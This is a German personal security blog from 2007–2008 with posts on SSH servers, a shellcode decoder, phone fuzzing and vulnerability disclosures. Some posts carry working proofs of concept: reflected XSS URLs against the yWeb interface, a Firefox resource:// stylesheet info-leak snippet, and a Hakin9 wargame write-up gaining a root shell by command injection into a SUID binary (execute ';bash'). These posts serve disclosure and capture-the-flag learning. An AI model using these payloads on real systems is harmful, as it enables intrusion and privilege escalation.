Alex' blog (Artikel mit Tag exploit)

SSH-Server für Windows

nospam@example.com (Alex) — Wed, 25 Jun 2008 23:41:00 +0200

Aktuell setze ich dann und wann den OpenSSH-Server ohne besonderen Namen auf Windows XP ein.

Einen Namen hat der Serverdienst nicht wirklich. Das Projekt dazu befindet sich auf der Webseite sshwindows.sf.net.

Das letzte Update ist von Mitte 2004. Es ist anzunehmen, dass es über die Jahre nicht fehlerfrei geblieben ist. Daher suche ich dafür jetzt endlich eine Alternative, da ich in Zukunft nicht nur ab und zu und auch nicht nur für kurze Zeit den Dienst am Laufen haben möchte, sondern er soll dauerhaft durchlaufen.

Dank Wikipedia bin ich über das Programm freeSSHd gestolpert, was allerdings keine Open Source Software ist, sondern Freeware und neuerdings ein Perl-Exploit für eine noch (immer) nicht geschlossene Sicherheitslücke existiert, welche ich vorhin selber erfolgreich nachvollzogen habe. Somit ist freeSSHd definitiv keine mögliche Alternative.

Darum bitte ich hier um Vorschläge ! (Möglichst OSS, auch wenn das etwas seltsam klingt, wenn man Windows als OS einsetzt.)

Neues Buch: The Web Application Hacker's Handbook

nospam@example.com (Alex) — Thu, 27 Dec 2007 22:44:00 +0100

Seit heute bin ich stolzer Besitzer eines neuen Buches: "The Web Application Hacker's Handbook" (ISBN-13: 978-0470170779). Geschrieben von den beiden Autoren Dafydd Stuttard und Marcus Pinto.

Ich bin gespannt auf das, was mir in den letzten Jahren u.U. entgangen sein sollte. Hoffentlich nicht viel.

Update: Komplett durchgelesen habe ich das Buch bisher zwar noch nicht, aber es fehlt definitiv die Erwähnung der Header "Range" und "Request-Range". Schließlich lässt sich mit letzterem einiges anstellen.

SCDC - Shellcode-Decoder

nospam@example.com (Alex) — Sat, 17 Nov 2007 02:32:00 +0100

Ich habe mir vor einigen Tagen mal schnell die Mühe gemacht und einen Shellcode-Decoder (genauer: die Opcodes darin werden "dekodiert") geschrieben, damit man schnell und einfach einen Einblick in den Shellcode bekommen kann.

Man kann in das Programm quasi irgendeinen Shellcode in der üblichen Form \x?? rein werfen und es kommt etwas besser lesbares wieder heraus.

Das hilft nicht nur beim Penetration-Testing, wenn man genauer nachschauen möchte, ob beim Ausnutzen der Lücke wirklich nur z.B. der obligatorische Taschenrechner auf der Windows-Plattform (warum auch immer ausgerechnet gerade "calc.exe") gestartet wird und nicht noch etwas anderes gemacht wird.

Momentan wird das Programm noch per Copy & Paste und mit der Eingabe von Hand gefüttert. In der nächsten Version kommt dann noch die Verarbeitung von Dateien hinzu. Die Veröffentlichung erfolgt ab diesem Zeitpunkt dann.

Wie man auf dem Screenshot unschwer erkennen kann, gibt es einen Regler für die Transparenz der Anwendung auch auf Nicht-Windows-Vista Betriebssystemen. Normalerweise stehe ich nicht so sehr auf diesen grafischen Firlefanz, aber Transparenz ist hier und da sogar ganz brauchbar. So wie auch hier, wie ich finde.

Update: Dateiverarbeitung ist nun integriert.

Fuzzing Samsung SGH-D600

nospam@example.com (Alex) — Sat, 10 Nov 2007 14:07:00 +0100

Vorgestern kam mir die spontane Idee mein Handy einmal zu fuzzen. Es sollte allerdings nicht ganz so einfach werden. Abgeschlossen ist diese Sache auch noch nicht.

Eigentlich dachte ich, dass das Kopieren einiger fehlerhafter JPEGs bereits den ein oder anderen Bug beim Betrachten im Handy hervorrufen würde. Jedoch lässt Samsung einen so weit gar nicht erst kommen. Benutzt habe ich das "Samsung PC Studio" zum Übertragen der Dateien.

Hier untersucht das "Samsung PC Studio" vor dem Übertragen die jeweilige Datei auf Korrektheit und bricht den Kopiervorgang u.U. ab. Das betrifft allerdings nur die Standard-Ordner auf dem Handy. Sobald man bspw. fehlerhafte PDF-Dateien in den Ordner "Andere Dateien" kopiert, worauf dann nur der Picsel File Viewer zugreifen kann, klappt der Kopiervorgang allerdings.

Jedoch habe ich das Gefühl, dass der Picsel File Viewer in einer Art Sandbox läuft, weil er ständig nur mit einer Fehlermeldung "Dokument beschädigt" die Anzeige abbricht. Möglicherweise waren es aber auch einfach nur noch nicht genug fehlerhafte PDFs.

Zurück nochmal zum "Samsung PC Studio":
Da besagte Software die Datei vorfiltert, könnte man vermuten, dass das Handy wahrscheinlich über (z.B.) JPEGs exploitbar ist, weil seitens des Handys kaum bis gar nicht gefiltert wird. Falls man den Weg über das "Samsung PC Studio" gehen will, so müsste dieses erst reverse engineert und entsprechend gepatcht werden oder einfacher: Ein eigenes Programm zur Dateiübertragung per AT-Kommando schreiben.
Was ich auch noch ausprobieren muss, ist der Weg über Bluetooth. Vielleicht lässt sich per OBEX generell viel Arbeit sparen.

Multipoint 0.9.4b anfällig für DoS-Attacken

nospam@example.com (Alex) — Sun, 28 Oct 2007 19:59:00 +0100

Die FTP-Server Software "Multipoint 0.9.4b" ist anfällig für DoS-Attacken über das FTP-Protokoll (Control Port).

U.U. lässt sich dieser Bug auch für eine Remote Code Execution ausnutzen. Da der FTP-Server (ftpserver.exe) mit System-Rechten läuft, wäre dieser Umstand fatal.

Wie man Firefox Daten entlockt

nospam@example.com (Alex) — Thu, 17 May 2007 13:53:04 +0200

Bislang funktioniert es leider nur lokal, aber dies lässt sich vielleicht noch abändern.
So wäre zumindest unter Windows möglich die Benutzernamen auszulesen und ein Fingerprinting der installierten Software vorzunehmen.

PoC:

<link rel="stylesheet" href="res%6Furce://..%5C" type="text/css" id="path">
<script>
alert(document.getElementById("path").sheet.href);
</script>

Update: So wie es aussieht wird der dieser Bug in Firefox 2.0.0.4 und 1.5.0.12 behoben sein.

Update 2: So funktioniert es auch von extern, anstatt nur lokal. Allerdings kann nur auf vorher bekannte Benutzernamen getestet werden, anstatt nur die vorhandenen auszulesen.

Wie man Spam per E-Mail nicht verhindert

nospam@example.com (Alex) — Sat, 28 Apr 2007 13:07:44 +0200

Um sich gegen Spam zu rüsten, verwenden viele Leute keine klickbaren Links mehr und verschleiern ihre E-Mail-Adresse auch dann, wenn sie nur reiner Text ist. [a] [at] (a) etc. kennt man ja.

Allerdings scheint dies jemand bei der Zero Day Initiative nicht ganz verstanden zu haben. Anders kann ich mir das jetzt nicht wirklich erklären (der kleine rot umrahmte Ausschnitt zeigt den Inhalt der Statuszeile - also den Verweis):

0-day: XSS in yWeb 2.5.1

nospam@example.com (Alex) — Mon, 16 Apr 2007 09:01:00 +0200

Wie ich schon einmal hier schrieb, bin ich auch für "Responsible Disclosure", aber in diesem Fall kann man eine Ausnahme machen, da man hier von keinen schlimmen Konsequenzen für die Besitzer von umgebauten d-Box 2 auszugehen ist.

Link 1:

http://d-box2/Y_Live.yhtm?typ=popup&mode=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

Das Webinterface einer auf Neutrino umgerüsteten d-Box 2 nennt sich yWeb.
Wer CVS-Snapshots benutzt, der hat bereits die Version 2.5.1 auf seinem Gerät. Ich bin zufällig darüber gestolpert. Sicherlich wird es noch viel mehr solcher Lücken geben.
U.U. ist diese Lücke auch schon in früheren Versionen vorhanden. Das habe ich bislang nicht überprüft und werde ich auch nicht mehr machen, da ich dazu die Firmware wieder downgraden müsste.

Da yWeb nur auf der d-Box 2 (vielleicht auch auf der d-Box !?) zum Einsatz kommt, kann man das Risiko, das von dieser Lücke ausgeht auf so gut wie 0 % setzen.
(In Verbindung mit Jikto sieht das natürlich wieder ein bisschen anders aus.)

Update: Dieses Mal habe ich mit Absicht nochmal nach ein paar Lücken gesucht ... ganz drei Minuten lang und ohne Quellcode. Das Ergebnis:

Link 2:

http://d-box2/Y_Live.yhtm?browser=<script>alert("XSS")</script>&type=live&mode=tv

Link 3:

http://d-box2/Y_LiveViewFull.yhtm?mode=radio&typ=<script>alert("XSS")</script>

Link 4:

http://d-box2/Y_LiveViewFull.yhtm?mode=<script>alert("XSS")</script>&typ=live

Und dann noch massig XSS über POST. Evtl. gehen sie auch umgeschrieben als GET, aber dazu war ich zu faul. Das Gerät ist kein lohnenswertes Ziel.

Lösung Hakin9 Wargame I

nospam@example.com (Alex) — Fri, 30 Mar 2007 23:48:09 +0200

Seit einigen Tagen ist der Einsendeschluss für das Hakin9 Wargame I erreicht. Ab jetzt sollte man getrost eine Lösung veröffentlichen können ohne unfair anderen gegenüber zu sein.

Mein Ausgangspunkt war ein Buffer-Overflow, aber über dieses schon x Mal durchgekautes und daher schon super langweilig gewordenes Thema zu schreiben, liegt mir heute fern. Der Overflow ist zwar toll, aber es geht eleganter, einfacher und wesentlich (!) schneller auf eine andere Art, die ich hier ausführlich vorstellen möchte.
(Wahrscheinlich findet man in der (über)nächsten Print-Ausgabe oder online sowieso sämtliche eingebauten Möglichkeiten, um den Root-Zugang erobern zu können.)

Die Lorbeeren gehen hierfür allerdings nicht an mich, sondern an "Rootuser", welcher mir in Erinnerung gerufen hat, dass man nicht alles gleich mit den ultimativen Methoden, sozusagen, "überfahren" muss.

Wer sich das Dateisystem anschaut dürfte in Rekordzeit über die ungewohnte Datei namens "execute" stolpern, welche das SUID-Bit gesetzt hat.

Wer diese Datei direkt aufruft bekommt nur eine Meldung, dass das Programm nicht weiss, was es auszugeben hat und beendet sich wieder. Wenn man ein Argument angibt, dann wird dieses Argument auf dem Monitor in einer neuen Zeilen ausgegeben. Bei Angabe von mehreren Argumenten tut das Programm wieder nichts als die bekannte Meldung auszugeben. Wenn man diese Argumente aber dann wieder als ein Argument über (einfache / doppelte) Anführungszeichen angibt und das Programm startet, so schreibt das Programm auch ganze Sätze auf den Monitor.

Wer den Befehl "echo" kennt, dem dürfte diese Art der Ausgabe bekannt vorkommen. Warum sollte aber ein Programm, was wie "echo" funktioniert, aber "execute" heißen, wenn da nicht noch mehr versteckt wäre ?! Entweder man analysiert es in gdb oder man probiert seine Vermutung direkt aus. Dazu gleich mehr.

Wenn man eine Verbindung zwischen Dateiname und Funktionsweise des Programmes herstellen will, muss das Programm das übergebene Argument über irgendeine Funktion ans OS übergeben. Wenn man allerdings davon ausgeht, dass der Dateiname und die Funktionsweise nicht zueinander irgendwie passen sollten, so könnte es schlichtweg nur eine printf-ähnliche Funktion sein, wo der Buffer-Overflow ansetzen könnte.

Mit genug Spieltrieb geht man aber direkt zur erst möglichen Vermutung über und probiert sie auch sofort aus, anstatt einen Debugger zu benutzen. Es sollte sich herausstellen, dass das Anhängen von gdb an "execute" tatsächlich unnötig ist und nur Zeit verbraucht - auch wenn es sich nur um wenige Tastenanschläge handelt.

Wer sich mit der Shell auskennt, der weiß, dass man mehrere Kommandos getrennt durch ein Semikolon in einem Rutsch angeben kann. Wenn "execute" nun den angegebenen String tatsächlich nur als ein Argument für "echo" benutzt und ans OS übergibt und dabei nicht filtert, dann sollte sich hier dank gesetztem SUID-Bit der Root-Zugang erobern lassen.

Ein

execute ";id"

sollte also so etwas wie:

uid=0(root) gid=0(root) ...

anzeigen, da der Befehl "id" mit Root-Rechten ausgeführt wird. Die Anführungszeichen sind hier nötig, da sonst das Semikolon als Trenner für mehrere Befehle in einer Zeile verarbeitet wird, anstatt ihn als Argument zu belassen.
Nachdem die Ausgabe von "id" von Root spricht, ist unser Ziel erreicht: Wir sind nun Root.

Jetzt kann man natürlich den Befehl "id" gegen den Dateinamen einer vorhandenen Shell auf dem System (sh, bash, etc.) austauschen. So kommt man also zu seiner Bash-Root-Shell: execute ";bash"

Jetzt dauert es nicht mehr lange bis zum Hakin9 Wargame II - hoffentlich schwerer.

0-day XP Exploits laufen nicht in Vista

nospam@example.com (Alex) — Fri, 09 Mar 2007 04:59:25 +0100

Seit gestern habe ich eine deutsche Lokalisierung von Microsoft Windows Vista Ultimate Edition (32 Bit) als Final hier auf einem Labor-Rechner am Laufen. Leider funktioniert keiner meiner schönen 0-day Exploits für XP unter Vista genauso.

Aber es gibt garantiert noch massig neue, vor allem in Vista, zu finden.

Hakin9 Wargame - die Zweite

nospam@example.com (Alex) — Sat, 03 Mar 2007 04:25:26 +0100

Es gibt Leute, die ihre Exploits ausschließlich in C schreiben. Wer seine Exploits für die Wargame Linux-CD (Hakin9 Ausgabe 03/2007) also nun in C schreiben will, der muss wissen, dass hier nicht die glibc verwendet wird, sondern die uClibc.

Auf der offiziellen Homepage von uClibc gibt es unter der Rubrik Toolchains ein fertiges uClibc Development System zum Download. Für die Kompilierung von Exploits reicht dies vollkommen aus. Nach dem Download muss das Archiv (i386) nur noch entpackt werden und z.B. so mittels dem Loop-Device ins System eingehangen werden:

sudo mount -o loop root_fs_i386.ext2 /mnt/mountpoint

Gefolgt von:

sudo chroot /mnt/mountpoint /bin/su -

... chrootet man in die Entwicklungsumgebung und kann den gcc benutzen.

Damit man sich nicht mit den uClibc-Gegebenheiten herumschlagen muss, sollte man der Einfachheit her seine Exploits statisch bauen. Also in etwa so:

gcc -o exploit exploit.c -static

Aber eigentlich reichen Bash, Perl und Python zum Exploiten soweit aus.

Hakin9 Wargame

nospam@example.com (Alex) — Thu, 01 Mar 2007 14:23:18 +0100

Heute morgen hielt ich die neuste Ausgabe der Zeitschrift Hakin9 in der Hand, als mir auf dem Cover "hakin9 Wargame beginnt!!!" ins Auge sprang. Befindet sich doch auf der zweiten CD ein Linux-Image (bootbar z.B. mit Qemu), was nur darauf wartet ge0wned zu werden.

Man soll die passenden Exploits zu den Sicherheitslücken, die im System verteilt sind, schreiben, um Root zu werden. Zur Verfügung stehen hier die (Skript-)Sprachen Bash, Perl und Python. Damit ist also nicht gemeint, dass man einfach einen Passwort-Cracker anwirft und den Passwort-Hash berechnet oder diesen gleich ganz entfernt.

So wie es aussieht, soll jetzt jeden Monat eine neue Wargame-CD mitgeliefert werden. Und ich dachte schon, dass die nun monatliche Ausgabe schon das Beste wäre. Nur frage ich mich, warum auf der polnischen Originalfassung noch die Rede von Bluetooth ist und in der deutschen Ausgabe nichts davon zu sehen ist. Zumal die deutsche Ausgabe fast nur noch aus Beiträgen von Deutschen besteht. Keine Übersetzer mehr ?

Ich bin jedenfalls schon Root. Sonst noch wer ?
Verraten werde ich hier jedenfalls nichts, da ein Gewinnspiel (ein Jahres-Abo für den schönsten Hack) dahinter steht.

Update: Da ich schon Anfragen bekomme und man es ohne Beweis vielleicht nicht unbedingt glaubt, hier ein paar Hinweise: Execute, Bash, Perl, Debugger.

MS Windows Explorer (AVI) unspecified DoS Exploit

nospam@example.com (Alex) — Thu, 25 Jan 2007 02:10:39 +0100

Ein Exploit mit dem langen Namen aus dem Titel wurde auf Milw0rm veröffentlicht.

Abgesehen vom Code stimmt bei diesem Exploit von shinnai so einiges nicht. Angeblich führt dieser Exploit zu einem Absturz von explorer.exe wenn man einen Rechtsklick auf die Datei ausführt - und das auf einem voll gepatchten Windows XP Professional von Microsoft.

Funktionieren tut dieser Exploit so aber nicht. Die Datei, die eigentlich die Endung AVI haben sollte laut Exploit, muss aber WMV lauten. Ein Rechtsklick oder das Markieren per Tastatur reicht zum DoS aus. Ebenso funktioniert der DoS-Exploit, in dem Internet Explorer, wenn man die Video-Datei, welche ganze 14 Byte groß ist, in eine HTML-Seite einbettet.

Um genau zu sein: Die Datei quartz.dll crasht und lässt so den Windows Explorer bzw. Internet Explorer abstürzen. Diese Datei gehört zu DirectShow, einer Komponente von DirectX.

Acer Notebooks in Gefahr durch ActiveX - Update

nospam@example.com (Alex) — Sat, 13 Jan 2007 14:00:00 +0100

Nachdem ich vor ein paar Tagen hier schrieb, dass ich die Veröffentlichung meines Exploits wahrscheinlich von der Reaktionszeit und der Informationspolitik von Acer abhängig machen werde, ist es nun Zeit ein Update dazu zu schreiben, da Acer nun einen Patch für das Problem bereitstellt. Jedoch finde ich deren Informationspolitik nicht überzeugend. Selbst die Update-Seite ist nicht sonderlich informativ ...